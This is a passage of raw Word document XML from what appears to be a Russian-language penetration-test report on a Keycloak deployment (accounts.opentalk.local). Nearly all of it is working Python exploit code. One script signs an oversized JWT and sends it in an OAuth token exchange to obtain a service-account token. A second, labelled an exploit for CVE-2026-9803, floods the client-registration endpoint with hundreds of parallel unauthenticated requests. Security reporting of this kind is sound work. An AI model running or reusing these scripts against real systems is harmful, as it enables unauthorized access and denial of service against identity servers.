        <w:t xml:space="preserve">    "exp": int(time.time()) + 3600,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF4F079" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="00C54DEE" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00C54DEE">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>dummy</w:t>
      </w:r>
      <w:r w:rsidRPr="00C54DEE">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>": "</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidRPr="00C54DEE">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">" * 5000                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBA1E02" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="00C54DEE" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C54DEE">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1E1A94" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="00C54DEE" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53EE7050" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="00C54DEE" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C54DEE">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"># Подписываем </w:t>
      </w:r>
      <w:r>
        <w:t>HS</w:t>
      </w:r>
      <w:r w:rsidRPr="00C54DEE">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">256 (обязательно, т.к. используем </w:t>
      </w:r>
      <w:r>
        <w:t>client</w:t>
      </w:r>
      <w:r w:rsidRPr="00C54DEE">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:t>secret</w:t>
      </w:r>
      <w:r w:rsidRPr="00C54DEE">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D579103" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r w:rsidRPr="003C3D0A">
        <w:t>oversized_jwt = jwt.encode(payload, CLIENT_SECRET, algorithm="HS256")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23632C22" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r w:rsidRPr="003C3D0A">
        <w:t xml:space="preserve">print(f"[+] Oversized JWT </w:t>
      </w:r>
      <w:r>
        <w:t>создан</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3D0A">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>Длина: {len(oversized_jwt)} символов.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA0DA90" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BED815B" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r w:rsidRPr="003C3D0A">
        <w:t xml:space="preserve"># ---------- 3. </w:t>
      </w:r>
      <w:r>
        <w:t>Отправляем</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3D0A">
        <w:t xml:space="preserve"> oversized JWT </w:t>
      </w:r>
      <w:r>
        <w:t>как</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3D0A">
        <w:t xml:space="preserve"> subject_token ----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11885EFF" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r w:rsidRPr="003C3D0A">
        <w:t xml:space="preserve">print("[3] </w:t>
      </w:r>
      <w:r>
        <w:t>Отправляем</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3D0A">
        <w:t xml:space="preserve"> oversized JWT </w:t>
      </w:r>
      <w:r>
        <w:t>как</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3D0A">
        <w:t xml:space="preserve"> subject_token...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B11582" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F92F0E6" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t>exploit_data = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633064C5" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r w:rsidRPr="003C3D0A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "grant_type": "urn:ietf:params:oauth:grant-type:token-exchange",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5296C2C4" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r w:rsidRPr="003C3D0A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:t>"client_id": CLIENT_ID,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBAB3F0" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "client_secret": CLIENT_SECRET,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2195FD1E" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "subject_token": oversized_jwt,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121C365A" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r w:rsidRPr="003C3D0A">
        <w:t xml:space="preserve">    "subject_issuer": CLIENT_ID,      # </w:t>
      </w:r>
      <w:r>
        <w:t>часто</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3D0A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>требуется</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5DD4FD" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r w:rsidRPr="003C3D0A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:t>"audience": CLIENT_ID             # иногда нужно</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC0D3E4" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598D8D78" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="267924EA" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t>exploit_response = requests.post(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1089E334" w14:textId="27F33398" w:rsidR="003C3D0A" w:rsidRPr="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r w:rsidRPr="003C3D0A">
        <w:t xml:space="preserve">    f"{</w:t>
      </w:r>
      <w:r w:rsidR="00763E44">
        <w:t>Keycloak</w:t>
      </w:r>
      <w:r w:rsidR="001F04CB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003C3D0A">
        <w:t>_URL}/auth/realms/{REALM}/protocol/openid-connect/token",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DDEC3A" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r w:rsidRPr="003C3D0A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:t>data=exploit_data,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BC389A" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    verify=False  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD42304" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38503DB3" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t># ---------- 4. Анализируем результат ----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795BCF92" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t>print("[4] Результат:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5237022F" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r w:rsidRPr="003C3D0A">
        <w:t>if exploit_response.status_code == 200:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235B9F84" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r w:rsidRPr="003C3D0A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:t>print("[+] УЯЗВИМОСТЬ ПОДТВЕРЖДЕНА! Получен токен сервис-аккаунта:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0347A6" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="003C3D0A">
        <w:t>print(json.dumps(exploit_response.json(), indent=2))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E063BA" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t>else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285EA7CB" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r w:rsidRPr="003C3D0A">
        <w:t xml:space="preserve">    print(f"[-] </w:t>
      </w:r>
      <w:r>
        <w:t>Ошибка</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3D0A">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>Код</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3D0A">
        <w:t>: {exploit_response.status_code}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CF2C03" w14:textId="5257ECB0" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r w:rsidRPr="003C3D0A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:t>print(exploit_response.text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DADDB2A" w14:textId="77777777" w:rsidR="00C54DEE" w:rsidRDefault="00C54DEE" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CA5B3C3" w14:textId="25345036" w:rsidR="003C3D0A" w:rsidRPr="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1a"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Ref234290812"/>
      <w:r>
        <w:t xml:space="preserve">Эксплойт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE-2026-9803</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9C9BC4" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t>import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C106A85" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t>import warnings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD35E20" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t>from concurrent.futures import ThreadPoolExecutor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CEBFC6" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t>from urllib3.exceptions import InsecureRequestWarning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9FFA15" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D49A15D" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r w:rsidRPr="003C3D0A">
        <w:t>warnings.filterwarnings('ignore', category=InsecureRequestWarning)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC04D4C" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18620E4A" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r w:rsidRPr="003C3D0A">
        <w:t>url = "https://accounts.opentalk.local/auth/realms/opentalk/clients-registrations/openid-connect"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CAF0C6" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t>headers_no_token = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78837EC5" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "Content-Type": "application/json",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A33729" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "Authorization": "Bearer"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8819CD" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F52BB9E" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13F476D7" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t>headers_empty_token = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247FD2CD" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "Content-Type": "application/json",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C6BAE5" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "Authorization": "Bearer "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FCB46A" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A21C74" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B2A4EBA" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t>headers_invalid_token = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211B2571" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "Content-Type": "application/json",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29781ADF" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "Authorization": "Bearer invalid-token"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FABA70A" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77341627" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2442C92F" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t>def send_request(headers):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312CE305" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220E1394" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r w:rsidRPr="003C3D0A">
        <w:t xml:space="preserve">        response = requests.post(url, headers=headers_no_token, data='{}', verify=False)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1111E9AA" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r w:rsidRPr="003C3D0A">
        <w:t xml:space="preserve">        print(f"Status code: {response.status_code}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773DCA83" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r w:rsidRPr="003C3D0A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:t>except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188F06CB" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r w:rsidRPr="003C3D0A">
        <w:t xml:space="preserve">        print(f"Exception occurred: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42044F52" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A63D1C2" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t># Список заголовков для тестирования</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2272D892" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r w:rsidRPr="003C3D0A">
        <w:t>headers_list = [headers_no_token] * 100 + [headers_empty_token] * 100 + [headers_invalid_token] * 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEB0B64" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1620D791" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="00C54DEE" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C54DEE">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"># Используем </w:t>
      </w:r>
      <w:r>
        <w:t>ThreadPoolExecutor</w:t>
      </w:r>
      <w:r w:rsidRPr="00C54DEE">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> для параллельного выполнения запросов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FAA029" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r w:rsidRPr="003C3D0A">
        <w:t>with ThreadPoolExecutor(max_workers=1000000) as executor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDEE724" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r w:rsidRPr="003C3D0A">
        <w:t xml:space="preserve">    futures = [executor.submit(send_request, headers) for headers in headers_list]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5603EF" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r w:rsidRPr="003C3D0A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:t>for future in futures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D07C428" w14:textId="7DE18F9C" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="003C3D0A">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        future.result()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52966A64" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="00C54DEE" w:rsidRDefault="003C3D0A" w:rsidP="00F363C6">
      <w:pPr>
        <w:pStyle w:val="112"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F43E753" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="00C54DEE" w:rsidRDefault="003C3D0A" w:rsidP="00F363C6">
      <w:pPr>
        <w:pStyle w:val="112"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="003C3D0A" w:rsidRPr="00C54DEE" w:rsidSect="00C27C90">
